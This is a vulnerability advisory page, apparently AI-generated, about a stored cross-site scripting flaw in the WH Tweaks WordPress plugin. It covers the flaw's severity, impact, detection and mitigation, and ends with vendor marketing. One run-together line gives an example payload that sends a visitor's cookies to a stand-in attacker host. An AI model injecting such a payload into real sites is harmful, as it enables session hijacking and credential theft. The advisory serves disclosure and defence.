
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67630 is a Stored Cross-Site Scripting (XSS) vulnerability in the WH Tweaks WordPress plugin developed by webheadcoder. It affects all versions of the plugin up to and including 1.0.2, and was disclosed on December 24, 2025, with the CVE assigned by Patchstack. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Patchstack).
The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored variant. An authenticated attacker with low-level privileges can inject malicious scripts into fields processed by the WH Tweaks plugin; these scripts are then persistently stored and executed in the browsers of other users who view the affected content. Exploitation requires network access and user interaction (a victim visiting the page containing the stored payload), but no elevated privileges beyond a basic authenticated role (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of web content. The scope is changed, meaning the impact extends beyond the plugin itself to the broader WordPress site and its users. Confidentiality and integrity are both assessed as low-impact per the CVSS scoring, with no direct availability impact (Feedly).
There is no public evidence of active in-the-wild exploitation or weaponized exploit kits targeting CVE-2025-67630 at this time. The EPSS score is approximately 0.029%, indicating a very low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script> tags or JavaScript event handlers (e.g., onerror, onload) stored in WordPress database fields associated with the WH Tweaks plugin options or post meta.wp_options table for injected content.WordPress site administrators should update the WH Tweaks plugin to a version beyond 1.0.2 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. As a general workaround, restrict plugin installation and contributor-level access to trusted users only, and consider deploying a Web Application Firewall (WAF) with XSS filtering rules to detect and block malicious payloads. Monitor the official WordPress plugin repository and Patchstack advisories for patch availability (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."